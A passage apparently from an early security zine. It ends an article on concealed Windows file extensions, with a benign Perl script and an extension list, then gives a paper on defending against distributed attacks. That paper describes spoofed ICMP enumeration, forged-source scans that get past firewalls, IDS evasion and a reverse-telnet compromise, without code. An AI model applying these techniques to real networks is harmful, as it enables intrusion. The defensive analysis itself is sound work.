propagate a virus or to plant a trojan horse. At the light of what is presented here, it is also easy to see the uselessness of software that scans mail in order to block certain type of files, while allowing others (for example, MailSweeper, MailSafe in ZoneAlarm, etc...). A more secure strategy could be by determining allowed file type, and blocking everything else, a bit like in a firewall which allows specific protocols, and blocks everything else. But the main reason why this type of products are useless against this type of attack is primarily because Windows contains these flaws. When I think that the average user still clicks on any attachment he receives, concealed or Appendix A. The Perl script Originally, in order to solve my problem, I made a small Perl script that generates dummy files wearing all possible file extensions under Windows. I included special characters in my analysis, to be sure that nothing is overlooked. The program is displayed below. That version is for 3-characters extensions, remove one or two loops to make 2-characters and 1-character extensions. For analysis clarity, I sorted the files under folders starting by the first letter of the extension. This is necessary for having decent refresh times from Windows Explorer. I also stopped at 3-letters extensions, since four letter extensions would have generated too many combinations to look at, but that doens't mean that they don't exist (.html, for example). The Perl script is provided here as reference material, and can be used or modified to repeat similar experiences. #!C:\perl @alpha=("a","b","c","d","e","f","g","h","i","j","k","l", "m","n","o","p","q","r","s","t","u","v","w","x","y","z", "0","1","2","3","4","5","6","7","8","9","\$","_",")", "(","&","^","%","#","@","!","'","-","=","+",";","[","]", "{","}"); for($i=0;$i<55;$i++) { mkdir $alpha[$i]; chdir $alpha[$i]; for($j=0;$j<55;$j++) {for($k=0;$k<55;$k++) { $ext=$alpha[$i].$alpha[$j].$alpha[$k]; $filename="test.".$ext; open (TESTFILE, ">>".$filename); print TESTFILE "bla"; print "#"; close (TESTFILE); } } chdir ".."; } Appendix B. The file extensions list Once these extensions were generated, I examined all 169 455 combinations through Windows Explorer, in order to determine the system behavior towards these files. The biggest majority of these files turned out to be generic file extensions, meaning that no application is associated with them, and as such represents no harm in the aspect of this research. So I proceeded to extract all file extensions that Windows knew something about, by examining the file icon and file description. Some of these extensions are native to the Windows operating system, some others are the result of application softwares installed on my machine. For this reason, we can't qualify this list as "the ultimate file extension list under Windows", since a system configured for different needs would have produced a different list. However, the list presented here is somewhat complete and is a good reference material. Some application softwares also identify some file extensions with the application name, instead of the more generi This list is provided as is, and is only a by-product of my original research. There could be mistakes or ommissions, if this is the case, simply notify me and I will update the list accordingly. You can always check out the website http://filext.com for a more complete list. .323 H.323 Internet Telephony .386 Virtual Device Driver - Executable .669 WinAmp media file .aca MS Agent Character file .acf MS Agent Character file .acg MS Agent Preview file .acs MS Agent Character file .ade MS Access Project Extension - Executable .adn MS Access Blank Project Template - Executable .adp MS Access Project - Executable .aif Mac .aiff Sound Clip .ani Animated Cursor .arc PkArc DOS archive .arj ARJ archive .art ART image .asa Active Server Document .asf Streaming Audio/Video File .asp Active Server Document - Executable .asx Streaming Audio/Video shortcut - Executable .au AU Format Sound .avi Video clip .awd Fax Viewer Document .b64 base64-encoded file .bas Visual Basic Class Module - Executable .bat MD-DOS Batch file - Executable .bhx Mac BinHex-encoded file .bmp Bitmap Image .c C source code .cab Windows propietary archiver .cat Security Catalog .cda WinAmo media file .cdf Channel File .cdx Active Server Document .cer Security Certificate .chm Compiled HTML Help file - Executable .cil Clip Gallery Download Package .cmd Windows NT Command Script - Executable .cnf SpeedDial (NeverShowExt) - Executable .com MS-DOS Application - Executable .cpl Control Panel extension - Executable .crl Certificate Revocation List .crt Security Certificate .css Cascading Style Sheet Document - Executable .csv MS Excel Comma Separated Values file .cur Cursor .dcx DCX Image Document .der Security Certificate .dic Text Document .dif MS Excel Data Interchange Format .dll Application Extension - Executable .doc MS Word Document .dot MS Word Template .dqy MS Excel ODBC Query file .drv Device Driver .dsm WinAmp media file .dsn MS OLE DB Provider for ODBC Drivers .dun Dial-Up Networking Exported file .drv Device Driver - Executable .eml Outlook Express Mail Message .exc Text Document .exe Application - Executable, by definition .far WinAmp media file .fav Outlook Bar Shortcuts .fdf Adobe Acrobat Forms Document .fnd Saved Search .fon Font file .gfi GFI File .gfx GFX File .gif GIF Image .gim GIM File .gix GIX File .gna GNA File .gnx GNX File .gra MS Graph 2000 Chart .grp MS Program Group .gwx GWX File .gwz GWZ File .gz GNU zip .h C definition code .hlp Help File - Executable .hqx Mac archiver file .ht HyperTerminal file .hta HTML Application - Executable .htm MS HTML Document 5.0 - Executable .html MS HTML Document 5.0 - Executable .htt HyperText Template .htx Internet Database Connector HTML Template .icc ICC Profile .icm ICC Profile .ics iCalendar File .idf MIDI Instrument Definition .iii Intel IPhone Compatible .inf Setup information - Executable .ini Configuration Settings .ins Internet Communication Settings - Executable .iqy MS Excel Web Query File .isp Internet Communication Setting - Executable .it WinAmp media file .its Internet Document Set .ivf IVF File .job Task Scheduler Task Object .jod MS.Jet.OLEDB.4.0 .jpe JPEG Image .jpg JPEG Image .js JScript file - Executable .jse Jscript Encoded Script File Ink Shortcut - Executable .lnk Shortcut (NeverShowExt) - Executable .lsf Streaming Audio/Video file .lsx Streaming Audio/Video shortcut .lwv MS Linguistically Enhanced Sound File .lzh LZH DOS archiver .m1v Movie Clip .m3u WinAmp Playlist file .mad MS Access Module Shortcut (NeverShowExt) - Executable? .maf MS Access Form Shortcut (NeverShowExt) - Executable? .mag MS Access Diagram Shortcut (NeverShowExt) - Executable? .mam MS Access Macro Shortcut (NeverShowExt) - Executable? .maq MS Access Query Shortcut (NeverShowExt) - Executable? .mar MS Access Report Shortcut (NeverShowExt) - Executable? .mas MS Access StoredProcedure shortcut (NeverShowExt) - Executable? .mat MS Access Table Shortcut (NeverShowExt) - Executable? .mav MS Access View Shortcut (NeverShowExt) - Executable? .maw MS Access Data Access Page Shortcut (NeverShowExt) - Executable? .mda MS Access Add-in .mdb MS Access Database - Executable .mde MS Access MDE Database - Executable .mdn MS Access Blank Database Template .mdt MS Access Add-in data .mdw MS Access Workgroup Information .mdz MS Access Database Wizard Template .mht MS MHTML Document Document 5.0 .mid MIDI file .mim WinZip file .mmc Medias Catalog .mod MODplayer Media file .mov Quicktime movie clip .mp1 MPEG1-audio file .mp2 MPEG2-audio file .mp3 MPEG3-audio file .mpa MPEG Movie Clip .mpe MPEG Movie Clip .mpg MPEG Movie Clip .msc MS Common Console Document - Executable .msg Outlook Item .msi Windows Installer Package - Executable .msp Windows Installer Patch - Executable .mst Visual Test Source Files - Executable .mtm WinAmp Media file .nsc NSC File (have an icon, probably associated with Media Player) .nws Outlook Express News Message .oft Outlook Item Template .opx MS Organization Chart 2.0 .oqy MS Excal OLAP Query File .oss Office Search .p10 Certificate Request .p12 Personnal Information Exchange .p7b PKCS #7 Certificates .p7m PKCS #7 MIME Message .p7r Certificate Request Response .p7s PKCS #7 Signature .pcd Photo CD Image - Executable .pcx PCX Image Document .pdf Adobe Acrobat Document .pfx Personnal Information Exchange .pgd PGPDisk volume .pif Shortcut to MS-DOS Program (NeverShowExt) - Executable .pko Public Key Security Object .pl Perl file - Executable .pls Winamp Playlist file .png PNG Image .pot MS PowerPoint Template .ppa MS PowerPoint Addin .pps MS PowerPoint Slide Show .ppt MS PowerPoint Presentation .prf PICSRules File .ps PostScript file - Executable .pwz MS PowerPoint Wizard .py Python file - Executable .qcp QUALCOMM PureVoice File .qt QuickTime Video Clip .que Task Scheduler Queue Object .rat Rating System File .reg Registration Entries - Executable .rmf Adobe Webbuy Plugin .rmi MIDI Sequence .rqy MS Excel OLE DB Query files .rtf Rich Text Format .s3m ScreamTracker3 Media file .scf Windows Explorer Command (NeverShowExt, generic icon) - Executable? .scp Dial-Up Networking Script .scr Screen Saver File - Executable .sct Windows Script Component - Executable .shb Shortcut into a document (NeverShowExt) - Executable .shf PGP Share .shs Shell Scrap object (NeverShowExt) - Executable .sig PGP Detached signature file .skr PGP Private Keyring .slk MS Excel SLK Data Import Format .snd AU Format Sound .snp Snapshot File .spa Flash Movie .spc PKCS #7 Certificates .spl Shockwave Flash Object .sst Certificate Store .sta sta file (Eudora) .stl Certificate Trust List .stm WinAmp media file .swf Shockwave Flash Object .swt Generator Template .sys System file .tar TAR archive file .taz gzipped TAR archive .tgz gzipped TAR archive .tif TIFF Image Document .ttf TrueType Font file .txt Text Document .tz gzipped TAR archive .udl MS Data Link .uls Internet Location Service (generic icon) - Executable? .ult Winamp media file .url Internet Shortcut (NeverShowExt) - Executable .uu UUencoded file .uue UUencoded file .vb VBScript File - Executable .vbe VBScript Encoded Script File - Executable .vbs VBScript Script File - Executable .vcf vCard File .vcs vCalendar File .voc Winamp Medias file .vsd VISIO 5 drawing .vss VISIO 5 drawing .vst VISIO 5 drawing .vsw VISIO 5 drawing .vxd Virtual device driver - Executable .wab Address Book File .wav Waveform audio file .wbk MS Word Backup Document .wht MS NetMeeting Whiteboard Document .wif WIF Image Document .wiz MS Word Wizard - Executable .wlg Dr. Watson Log .wm Windows Media Audio/Video File .wma Windows media audio .wpd WordPerfect file .wpz Winamp extension installation file .wri Write Document .wsc Windows Script Component - Executable .wsh Windows Script File - Executable .wsh Windows Scripting Host Settings File - Executable .wsz Winamp extension installation file .xif XIF Image Document .xla MS Excel Add-in .xlb MS Excel Worksheet .xlc MS Excel Chart .xld MS Excel 5.0 DialogSheet .xlk MS Excel Backup File .xll MS Excel XLL .xlm MS Excel 4.0 Macro .xls MS Excel Worksheet .xlt MS Excel Template .xlv MS Excel VBA Module .xlw MS Excel Workspace .xm ScreamTracker media file .xml XML Document .xnk Exchange Shortcut (NeverShowExt) - Executable? .xsl XSL Stylesheet .xxe XXencoded file .z Compressed file .z0 Z0 file (ZoneAlarm) .z1 Z1 file (ZoneAlarm) .zip Zipped file .ZL? ZoneAlarm Mailsafe Renamed File ZoneAlarm Mailsafe will quarantine mail attachments and changes their extension. The conversions are: .ADE to .ZL0 .ADP to .ZL1 .BAS to .ZL2 .BAT to .ZL3 .CHM to .ZL4 .CMD to .ZL5 .COM to .ZL6 .CPL to .ZL7 .CRT to .ZL8 .EXE to .ZL9 .HLP to .ZLA .HTA to .ZLB .INF to .ZLC .INS to .ZLD .ISP to .ZLE .JS to Z0 .JSE to .ZLF .LNK to .ZLG .MDB to .ZLH .MDE to .ZLI .MSC to .ZLJ .MSI to .ZLK .MSP to .ZLL .MST to .ZLM .PCD to .ZLN .PIF to .ZLO .REG to .ZLP .SCR to .ZLQ .SCT to .ZLR .SHS to .ZLS .URL to .ZLT .VB to .Z1 .VBE to .ZLU .VBS to .ZLV .WSC to .ZLW .WSF to .ZLX .WSH to .ZLY ===========[ Strategies for Defeating Distributed Attacks ]============= --- by Simple Nomad --- Abstract With the advent of distributed Denial of Service (DoS) attacks such as Trinoo, TFN, TFN2K and stacheldraht [1], there is an extreme interest in finding solutions that thwart or defeat such attacks. This paper tries to look not just at distributed DoS attacks but distributed attacks in general. The intent is not to devise or recommend protocol revisions, but to come up with useable solutions that could be implemented at a fairly low cost. This paper is also written with the idea that probably 90% of the problems surrounding distributed attacks can be easily solved, with the last 10% requiring some type of long-range strategies or new code to be written. Basics About Attack Recognition How does one recognize an attack? Not just a Denial of Service attack, but any attack? Before we can start applying solutions, we need to have a discussion of attack recognition techniques. So let's first look at the two main methods of attack recognition - pattern recognition and affect recognition. Pattern recognition looks for a measurable quality of the attack in a file, a packet, or in memory. Looking for file size increases of 512 bytes or seeing a certain byte sequence in RAM are two simple examples of pattern recognition. Looking for the string "phf.cgi" in web traffic might be a simple method used by a network-based Intrusion Detection System (IDS). Effect recognition is recognizing the effects of an attack. An example might be specific log file entries, or an "unscheduled" system reboot. In intrusion detection, pattern recognition is the only method used by network-based IDS, while both pattern and effect recognition can be found in host-based IDS. And herein lies the crux of the problem - attack methods are calling for effect recognition methods to be applied to network-based IDSes, and the technology just isn't there. See [2], [3]. Pattern recognition alone has problems to begin with. If a pattern that is being checked for is altered by the attacker, such as a key word or byte sequence, then the IDS will miss it. For over a year it has been common knowledge that by dividing up an attack sequence into fragmented packets, you can defeat most IDSes. In fact, a majority of commercial IDSes are still unable to process fragmented IP packets [4]. Now couple this with the fact that effect recognition technology for network-based IDSes is virtually non-existent, and you can see the problem. If an attack is a one-time network event, your network-based IDS stands a chance of detecting it, but a sustained series of network events will be even more difficult to detect, especially if the events are disguised to look like normal network traffic. Distributed DoS attack tools such as stacheldraht will leave definite patterns that can be searched out on the network. But attackers can modify the source code of the tools, causing a different pattern to be produced. If they do this, the IDS will not detect the new pattern. What we need is an Overall Behavior Network Monitoring Tool, that can look at logs on different systems from different vendors, sniff realtime network traffic, and can logically determine bizarre or abnormal behavior (and alert us). Unfortunately, there *is* no such tool, so we need to make use of what tools we have (firewalls, IDS, etc) in a way that will thwart or at least notify us about potential distributed network attacks. We will discuss such strategies in this paper. Definition of the Attack Model Before we start defining attack models, it should be noted that a number of the attack models discussed here are theoretical. To prevent confusion we will not differeniate between the two. Our discussion here centers around the overall concept of a distributed attack, real and theoretical, and tries to solve for the concept instead of specific attacks. There are two basic models of attack. In the first, the attacker does not need to see the results. In the second, the attacker *does* need to see the results. Distributed DoS attacks are good examples of attacks where the attacker does not need to see the results, and since this simplifies our attack model, we will examine that model first. Distributed attacks have one interesting element in common. Typically someone else's system is used to perform fairly critical tasks to meet the objective. The flow of action is usually like so: Figure 1: *--------* *--------* *-------* | | | | | | | client |---->| server |---->| agent | | | | | | | *--------* *--------* *-------* issues processes carries commands command out commands requests to agents There can be multiple servers, and hundreds of agents. The usual deployment involves installing servers and agents on compromised systems, in particular installing the agents on systems with a lot of bandwidth. To help prevent detection and tracing back to the attacker directing the activities, the act of issuing commands is typically done using encryption, and by using ICMP as a transport mechanism. With encryption, this helps at least hide the activities from active sniffers being used by administrators, although it does not preclude detection by other means. The packets used in part of the communications by such products as TFN2K and stacheldraht can be encrypted, rendering common viewing via a sniffer or IDS from casual detection of the rogue packets. While the model for hostile behavior that does not require viewing of the results or "return packets" is in reality a little more complex than the model I've outlined, the model for hostile behavior that *does* require viewing of the results or "return packets" is a lot more complex [5]. For the sake of brevity, we will only cover possible techniques that will help hide the attacker's source address and/or use maximum stealth techniques, including theoretical ones such as traffic pattern masking and upstream sniffing [6]. We will divide up the more complex scenario of "the attacker seeing the results" into three categories - enumeration of targets, host and host service(s) identification, and actual penetration - and outline each category. Enumeration: This is the act of determining what hosts are actually available for potential probing and attack. Enumeration example 1, figure 2: *----------* *---------* | | NMap forged ICMP_ECHO packets | | | attacker |--------------------------------->| targets | | | ---------------------| | *----------* / *---------* | / ngrep target replies to forged source | / <-------------------- This first enumeration example is fairly simple - by sending forged ICMP_ECHO packets, the attacker sniffs the replies destined for the forged source address. This can be readily accomplished using tools such as NMap [7] and ngrep [8] as long as the attacking host is upstream from the target network. Enumeration example 2, figure 3: *---* | f | | i | | r | *----------* | e | *---------* | | forged ICMP_TSTAMP packets | w | | | | attacker |-----------------------------| a |-->| targets | | | ----------------| l |---| | *----------* / | l | *---------* | / *---* snort target replies to forged source(s) | / <-------------------- This second example of enumeration is also fairly simple. Assuming the firewall is blocking ICMP_ECHO, we decide to send ICMP_TSTAMP packets with forged addresses. Instead of ngrep in this example, we use an IDS product called snort [9]. Snort is configured to capture the ICMP_TSTAMPREPLY packets. Once again in this example we are assuming the attacking host is upstream of the target network. Now we move on to host and host service identification. Host/Host Services Identification example 1, figure 4: *---* | f | | i | | r | *----------* NMap forged source address | e | *---------* | | with source port of 80 | w | | | | attacker |-----------------------------| a |-->| targets | | | ----------------| l |---| | *----------* / | l | *---------* | / *---* snort target replies to forged source | / <-------------------- In figure 4, port and OS identification scans are done against targets behind a firewall by taking advantage of the fact that SYN/ACKs with a source port of 80 are allowed through. Mistaken as web traffic, the IDS and the firewall are bypassed and the targets are scanned. Using a list of valid hosts attained via host enumeration techniques, only valid targets are scanned. By forging the source address, it helps hide the true source of the scan. Reply packets are recovered via snort. Figure 4 outlines a poorly configured firewall (or even a simple packet filtering ruleset on a router), so we will look at something a little more sophisticated. Host/Host Services Identification example 2, figure 5: *----------* | | /->| attacker |---------- | | | \ | *----------* | | | | | | | v v | *---------* *---------* | | | | | | | client1 |-- | client2 |-- | | | \ | | \ *---* | *---------* \ *---------* \ | f | | | \ \ | i | | v \ \ | r | *---------* | *---------* \ -----| e |-->| | | | | ----------------------| w |-->| various | | | client3 |-----------------------------| a |-->| targets | | | | ----------------| l |---| | | *---------* / | l | *---------* | / *---* | *---------* / | | | / \->| sniff |--------/ | results | / | | / *---------* / / <----------------- / <--------------- / <------------- Figure 5 is one of the more complex models. This involves multiple clients directed by a master, performing slow methodical port scans of the target network. All of the port scans are using forged addresses from trusted sources whose IP addresses are allowed through the firewall. An upstream sniffer captures the replies. The clients and sniffer could even reside on hosts belonging to the trusted sources, and perhaps even be allowed through a VPN. This type of scenario is rather complex due to the lack of custom software need to perform the scans, although various existing products could be modified to handle most of the elements involved. When discussing actual attacks, in particular distributed attacks, the best path into a network is the path you know works. Therefore the main line of attack will more than likely involve Figures 4 and 5, with a few possible modifications. Actual Penetration, example 1, figure 6: *---* | f | | i | | r | *----------* Sploit to remotely set up a | e | *---------* | | reverse telnet via port 25 | w | | | | attacker |-----------------------------| a |-->| targets | | | ----------------| l |---| | *----------* / | l | *---------* / *---* Return of reverse telnet *----------* output on port 80 | | / | listener |<------- | | *----------* In this example an exploitable sendmail daemon was found on a system that didn't really need sendmail running, and since sendmail was running as root, a reverse telnet was set up [10]. Actual Penetration, example 2, figure 7: *----------* | | /->| attacker |---------- | | | \ | *----------* | | | | | | | v v | *---------* *---------* | | | | | | | client1 |-- | client2 |-- | | | \ | | \ *---* | *---------* \ *---------* \ | f | | | \ \ | i | | v \ \ | r | *---------* | *---------* \ -----| e |-->| | | | | ----------------------| w |-->| various | | | client3 |-----------------------------| a |-->| targets | | | | ----------------| l |---| | | *---------* / | l | *---------* | / *---* | *---------* / | | | / \->| sniff |--------/ | results | / | | / *---------* / / <----------------- / <--------------- / <------------- In figure 7 the attacker directs attacks against targets via the clients to try to compromise various daemons to run arbitrary commands as root. Results are sent to forged IP addresses, but a sniffer captures these results. In case of logging and host-based IDS, the attacker is not suspected, the owners of the forged IP addresses are. Patterns of Attack At first glance, it may seem easy to defend against the onslaught of attacks, probes, and enumeration techniques. But it must be remembered that byte pattern recognition or traffic on certain source and destination ports can easily be changed by the attacker. A lot of the techniques outlined above can and will use encryption, and can potentially operate over TCP, UDP, and/or ICMP, and can use different source and destination ports. In particular let's look at figures 5 and 7 above. These are complex scenarios, but could conceivably be done especially from a trusted host or network. The VPN is often considered a security tool, and its use is considered adequate in helping secure a channel. But all a VPN does is ensure that a communications link can be established with the communications link itself being somewhat secure. The end points are critical - if you have established a VPN with a business partner of field office, you are only as secure as that remote site's computer systems. Does your business partner or remote office keep updated and patched as often as you do? Does your vendor have a security policy in place? Have you even asked your business partner or vendor these questions? It is also possible that during upstream sniffing sessions that an attacker could determine that due to relationships with certain vendors you may have rules through the firewall entirely based upon IP address and/or hostname. These can and will be exploited if uncovered, either through the trusted vendor or by spoofing and sniffing as outlined in the above models. However we *can* look at the above attack models and make some general determinations. - All attacks involve possible covert communication methods between the attacker and the attacking/probing device. - When possible, traffic is disguised to look like normal network traffic. - When possible, IP addresses will be spoofed to mask the location of attacker, attack clients, probing machines, and/or to implicate a third party in case of accidental discovery. Primary Defensive Techniques Let's first look at the easy-to-do defenses that can be put in place. First off we need to eliminate as many unwanted forms of traffic through the firewall as possible. This can be done by denying all traffic, and very carefully opening things up. Sometimes by clicking on a pretty icon in the firewall GUI control software labelled "DNS" or "Mail" we feel we are controlling the environment, but this may be opening up ports 53 and 25 to the world. If attackers learn this, they could use these openings to help set up covert channels. Ensure that when allowing public traffic into your network (DNS, SMTP, HTTP, FTP) that you do *not* allow these forms of traffic into your networks without limits. Check to make sure that turning on DNS in the firewall did not open up TCP and UDP port 53 to every device on your network. All public boxes, such as your Web, FTP, and mail servers should reside in a separate network (appropriately referred to as a "dead zone" or DMZ). These boxes should not be allowed to initiate network conversations with computers inside the internal network - if compromised, these boxes will be used as stepping stones to the internal network across all channels you leave open. All Internet-connected boxes should not have compilers on them, should have as few services running as possible, and should have fairly sophisticated modifications to prevent compromise (see the Host Recommendations section below). Make sure management channels and ports are closed or at least secured. For example, does turning on remote management to your Checkpoint Firewall automatically open up port 256? Make sure you've set things up correctly. Is SNMP closed from the outside? From the DMZ? While it is my opinion that all computers should be secured as adequately as possible, if you are on a limited budget, or you must prioritize what boxes get secured first, secure them in this order - firewall, public boxes in the DMZ, internal servers, workstations. Obviously keeping the boxes themselves as updated as possible is the most desired thing - the latest patches and tweaks - as this will make your systems less of a potential target or launch point for further attacks. ICMP Defenses Since a lot has been written about TCP/UDP rules for a firewall, but little has been written about ICMP, I've decided to expand upon the philosophy of handling ICMP at the firewall. It is considered "bad form" by some Internet pundits to turn off ICMP entirely. ICMP was originally developed to *help* networks, and is often used as a diagnostic tool by WAN administrators. But today the various inadequacies of ICMP are being used and abused in ways not originally intended by supporters of RFC 792, and certain strategies need to be implemented to make things a little safer. Therefore we need to try and contain as much of the abuse as possible without shooting ourselves in the foot. Most Internet-connected sites block inbound ICMP Echo to their internal networks, but do not block most everything else. This will still leave the site inadequately protected. Inbound ICMP Timestamp and Information Request will respond if not blocked, and both can be used for host enumeration across a firewall that allows such traffic through. Even forging packets with illegal or bad parameters can generate an ICMP Parameter Problem packet in return, thereby allowing yet another method of host enumeration. One of the common methods used to issue commands from a master to clients (especially if the clients are behind a firewall) in a stealth manner is to use ICMP Echo Reply packets as the carrier. Echo Replies themselves will not be answered and are typically not blocked at the firewall. An excellent early example of this type of communication can be found in Loki [11]. Loki was also pilfered from (at least in concept) during the development and evolution of TFN [1] as communications use Echo Reply packets between client and server pieces, which are also encrypted. First we have to approach the entire "ICMP limiting" problem in terms of both inbound and outbound. To cut some of the communication links in models outlined above we have to "contain" ICMP. ICMP Echo does come in handy for verifying that remote sites are up, but outbound Echo should be limited to support personnel (okay) or a single server/ICMP proxy (preferred). If we limit Echo to a single outbound IP address (via a proxy), then our Echo Replies should only come into our network destined for that particular host. Redirects are typically found in the wild between routers, not between hosts. The firewall rules should be adjusted to allow these types of ICMP only between the routers directly involved in the Internet connection that need the information. If the firewall is functioning as a router, it is quite possible that Redirects can be completely firewalled without adverse effects, both inbound and outbound. Source Quench packets are generated when a large amount of data is being pushed toward a host or router, and the host or router wishes to tell the sender to "slow things down". This is typically seen during streaming uploads of data to a host, and can be generated by a router along the way or via the target host itself. If the hosts inside the network can only upload to a host on the Internet via FTP, then it is possible that the only source of legitimate Source Quench packets will be destined toward the FTP proxy, and all other Source Quench traffic can be dropped. Time Exceeded packets are an interesting animal. There are two types of Time Exceeded packets - code zero for Time To Live (TTL) timeouts, and code one for fragmented packet reassembly timeout. The TTL is a value initialized and placed in the TTL field of a packet when it is first created, and as the packet crosses a network hop its TTL counter is decremented by one. Starting with a TTL of 64, once the 64th hop is crossed the router that decremented the TTL to zero will drop the packet and send a Time Exceeded back to the sender with a code of zero, indicating the maximum hop count was exceeded. In the case of fragmented packet reassembly timeout, when a fragmented datagram is being reassembled and pieces are missing, a Time Exceeded code one is set and the packet is discarded. It is possible to perform host enumeration by sending fragmented datagrams with missing fragments, and waiting for the Time Exceeded code one to alert the sender that a host existed at the address, so care must be taken with the handling of these types of packets. It is recommended that by proxying all outbound traffic, inbound ICMP traffic should come back through the firewall to the proxy address. This at least limits Time Exceeded packets to a single inbound address. But it is possible to block Time Exceeded packets. Most applications will have an internal timeout that is not dependent upon receiving a Time Exceeded packet, some applications may still be relying upon receiving one. YMMV on this one. Block it unless too many critical internal applications are affected. The ICMP Parameter Problem packets are sent whenever an ICMP packet is sent with incorrect parameters that will cause the packet to be discarded. The host or router discarding the host sends a Parameter Problem packet back to the sender, pointing out the bad parameter. By sending illegally constructed ICMP packets to a host, you can cause the host to reply with a Parameter Problem packet. Obviously if the type of illegally constructed ICMP is allowed through the firewall, you can enumerate hosts. There is no reason to allow inbound or outbound Timestamp, Timestamp Reply, Info Request and Info Reply packets across the firewall. Whatever value they might have should be limited to the internal network only, and should never cross onto the open Internet. The same may be said of Address Requests and Address Replies, as there is no real reason for a host to be aware of the destination's IP Address mask to send the packet. Address Requests and Replies are intended to assist diskless workstations booting from the net to determine their own IP address mask, especially if there is subnetting going on, therefore there is no reason to pass this traffic across a firewall (in fact, routers adhering to RFC 1812 will not forward on an Address Request to another network anyway). The general philosophy here is that only publicly addressable servers (such as web, e-mail, and FTP servers), firewalls, and Internet-connected routers have any real reason to talk ICMP with the rest of the world. If adjusted accordingly, virtually all stealth communication channels that use ICMP, inbound or outbound, will be stopped. Host Recommendations What are some good precautions we can use on hosts connected to the Internet? We will not cover Microsoft offerings here, but will assume the we will be using only open sourced operating systems on hosts we have that are addressable from the Internet (Web, SMTP, FTP, etc). All machines serving the public via the Internet should be locked down. Here is a recommended list of tactics to help protect the machines exposed to the Internet. - Isolate all public servers to a DMZ. - Each offered service should have its own server. For example, if your public services are email and web, do not try to save money and run both on the same server. Use separate servers. - If using Linux (recommended) you can use any one or several of the "buffer overflow/stack execution" patches and additions to prevent most (if not all) local and remote buffer overflows that could lead to root compromise. Solar Designer's patch [13] is highly recommended as it includes additional security features, such as secured - Instead of SSH, use Secure Remote Password (SRP) [14]. SRP offers PAM compatibility, drop-in replacement for telnet and FTP daemons, encrypted telnet and FTP sessions, and defeat of zero knowledge attacks. One great advantage to SRP is that only enough material to determine that you know the password is stored in the password file, so even if the password file is captured by an intruder it cannot be cracked. You can even have passwords up to 128 characters in length! - Limit access to those SRP-enabled telnet and FTP daemons to internal addresses only, and insist that only SRP-enabled clients can talk to them. If you must run regular FTP for public access (such as anonymous FTP) run SRP FTP on a different port. - Use trusted paths. Only allow execution of root-owned binaries that are in a directory owned by root that is not world or group writable. To enforce this you can modify the kernel if need be [15]. - Use the built-in firewalling capabilities. By turning on firewall rules you can often take advantage of the kernel's handling of state tables. The state table keeps track of IP addresses and port connections. If a packet is received that is *not* a SYN packet and *not* part of an existing conversation, drop the packet. This may require kernel modification to support it [16]. - Use some form of port scan protection. This can be done either via a daemon on Linux [17] or via kernel modifications [16]. - Use Tripwire [18] or an equivalent to help detect modifications to important files. Version 2.2.1 for Linux is freeware, other versions are not. IDS Recommendations Since many of the methods to defeat network-based IDS are still applicable to most commercial IDS products available (see [2], [3], and [4] for details), it is recommended using an IDS that at least can reassemble or at least detect fragmented datagram packets. This limits you to Snort [9], NFR, Dragon, and BlackIce [19], with Snort in its current version only able to detect very small fragment sizes of packets. Only Dragon can handle fragmented packet reassembly at high network speeds with lots of traffic. If you are on a budget, you can limp by with Snort, although any serious or high-traffic site is going to require Dragon to handle the load. The next question is - what should I watch for? Here is a partial list: - Be sure to include all of the existing rules, including new rules for some of the distributed DoS attacks (see [1] for details on those attacks). - Since much of ICMP will be blocked if the ICMP Recommendations section is followed, numerous opportunities for IDS triggers exist. Any inbound or outbound ICMP packets that would normally be blocked can be triggered upon. - *Any* network traffic you have firewalled off can be a potential IDS trigger. Examine what you are blocking and why, and consider adding IDS rules to look for such packets. - If your IDS supports detection of attacks over long periods of time (for example, a port scan) be sure to not exclude trusted hosts you might be allowing through the firewall. This includes VPNs. Spoofed packets from those trusted sites might *look* like normal traffic, but could possibly be probes or attacks. - If you can train any user of ping to use small packet sizes when pinging hosts (such as 'ping -s 1 target.address.com'), set your IDS to look for Echo and Echo Replies with packets larger than 29 bytes. Conclusions By securing the hosts, limiting the channels of communication between nefarious elements, and adjusting firewall and IDS rules, most of the network attacks outlined here (real and theoretical) can be defeated. A side effect of implementing these recommendations is that not only are distributed attack models stopped, but overall security is greatly enhanced. Full frontal attacks are easily detected and can be quickly avoided. Acknowledgements I would thank the BindView RAZOR team for their support during the writing of this paper. Numerous times I asked the team questions and received answers that opened up new ideas. Their help was invaluable. I'd also like to thank my wife and kids for being patience while I toiled away for hours over the computer. There is nothing like support from home. References Here are some articles and papers related to the subject presented here. [1] David Dittrich (dittrich@cac.washington.edu) provided detailed analysis of three distributed denial of service tools found in the wild. "The DoS Project's "trinoo" distributed denial of service attack tool" http://staff.washington.edu/dittrich/misc/trinoo.analysis; "The "Tribe Flood Network" distributed denial of service attack tool "http://staff.washington.edu/dittrich/misc/tfn.analysis; The "stacheldraht" distributed denial of service attack tool http://staff.washington.edu/dittrich/misc/stacheldraht.analysis. [2] Thomas H. Ptacek and Timothy N. Newsham wrote an enormously influential paper discussing IDS avoidance, with many of the documented techniques still not corrected by commercial IDS vendors since the paper's debut in January of 1998. "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection" - http://www.clark.net/~roesch/idspaper.html [3] Rain Forest Puppy (rfp@wiretrip.net), author of numerous advisories, wrote a tool called whisker, which is a CGI vulnerability scanner. RFP wrote up this paper explaining the techniques he outlined in whisker, can could be applied to other protocols besides HTTP. "A look at whisker's anti-IDS tactics" http://www.wiretrip.net/rfp/pages/whitepapers/whiskerids.html [4] Greg Shipley did a review for Network Computing of intrusion detection systems, both host and network based. The results were interesting enough to influence some of the thoughts in this paper as the article was much more interesting than one would expect for a trade magazine product review. "Intrusion Detection: Take Two" http://www.networkcomputing.com/1023/1023f1.html [5] Simple Nomad (thegnome@nmrc.org) presentations to SANS covered possible network enumeration, host identification, and port scanning techniques using various adaptations of off-the-shelf products. "Network Cat and Mouse", SANS Network Security '99, New Orleans http://www.sans.org/, "The Paranoid Network", to be presented at SANS 2000, Orlando, FL [6] Simple Nomad (thegnome@nmrc.org) white paper that expanded on the ideas originally developed and presented in [5]. "Traffic Pattern Duplication to Avoid Intrusion Detection", To be released soon. [7] Fyodor (fyodor@dhp.com) has written NMap, considered to be one of the best host and host service enumeration tools available, loaded with tons of features. NMap, http://www.insecure.org/nmap/ [8] Jordan Ritter (jpr5@darkridge.com, jpr5@bos.bindview.com) has written a handy tool to sniff and grep through network traffic, appropriately called ngrep. ngrep, http://www.packetfactory.net/ngrep/ [9] Martin Roesch (roesch@clark.net) has written a great IDS called snort that is simple to use, fast, and free. snort, http://www.clark.net/~roesch/security.html [10] 